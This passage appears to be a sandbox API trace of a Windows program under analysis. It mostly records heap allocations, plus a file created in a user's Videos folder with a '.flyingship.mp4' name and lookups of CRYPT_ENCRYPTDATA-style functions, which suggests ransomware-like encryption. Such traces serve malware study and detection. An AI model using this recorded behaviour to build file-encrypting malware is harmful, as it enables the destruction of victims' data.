RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0192.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0192.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0192.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0192.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0192.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0192.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0192.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0192.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0192.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0192.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0192.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0192.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0192.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0192.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0192.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0192.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0192.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0192.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0192.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0192.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0192.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0192.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0192.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0192.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0192.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5de0 [0192.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0192.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0192.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0192.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0192.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0192.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0192.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0192.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0192.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0192.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0192.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0192.244] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0ntyy6p")) returned 0x10 [0192.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0192.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0192.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0192.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0192.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0192.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0192.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0192.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0192.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0192.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0192.246] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.flyingship.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0ntyy6p\\iiphjeo8.flyingship.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0192.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0192.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0192.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0192.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0192.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0192.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0192.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0192.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0192.247] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0192.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0192.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0192.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0192.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0192.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0192.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0192.247] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0192.247] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0192.248] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0192.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0192.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0192.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0192.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0192.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0192.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0192.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0192.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0192.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0192.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0192.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0192.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0192.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0192.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0192.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0192.248] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0192.249] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xc1eb, lpOverlapped=0x0) returned 1 [0192.251] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0192.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0192.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0192.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0192.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0192.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc1eb) returned 0xbea018 [0192.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0192.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0192.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0192.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0192.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0192.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0192.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc1eb) returned 0xbf6210 [0192.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0192.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0192.253] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0192.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0192.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0192.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0192.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0192.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc1eb) returned 0xbea018 [0192.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0192.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0192.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0192.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0192.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0192.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0192.254] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0192.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0192.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0192.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0192.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0192.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0192.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0192.254] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0192.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0192.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0192.254] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0192.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0192.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0192.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26c8 [0192.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0192.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0192.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0192.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0192.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc1eb) returned 0xbea018 [0192.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0192.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27a8 [0192.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0192.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0192.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0192.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27d8 [0192.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0192.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0192.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0192.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2838 [0192.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0192.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0192.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0192.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd750 [0192.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0192.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0192.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0192.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0192.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0192.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc1eb) returned 0xc02408 [0192.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0192.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0192.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0192.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0192.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0192.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0192.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0192.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0192.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0192.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0192.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0192.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0192.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0192.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0192.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0192.256] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0192.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0192.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0192.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0192.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0192.256] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0192.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0192.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0192.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0192.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0192.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0192.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0192.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0192.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0192.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0192.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0192.257] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0192.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0192.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0192.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0192.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26e8 [0192.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0192.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0192.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0192.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0192.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f70 [0192.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0192.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0192.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0192.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0192.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0192.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0192.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0192.257] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0192.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0192.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0192.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0192.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0192.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0192.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0192.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0192.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0192.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0192.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0192.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0192.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0192.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0192.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0192.258] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0192.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0192.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0192.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0192.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0192.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0192.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0192.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0192.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0192.258] 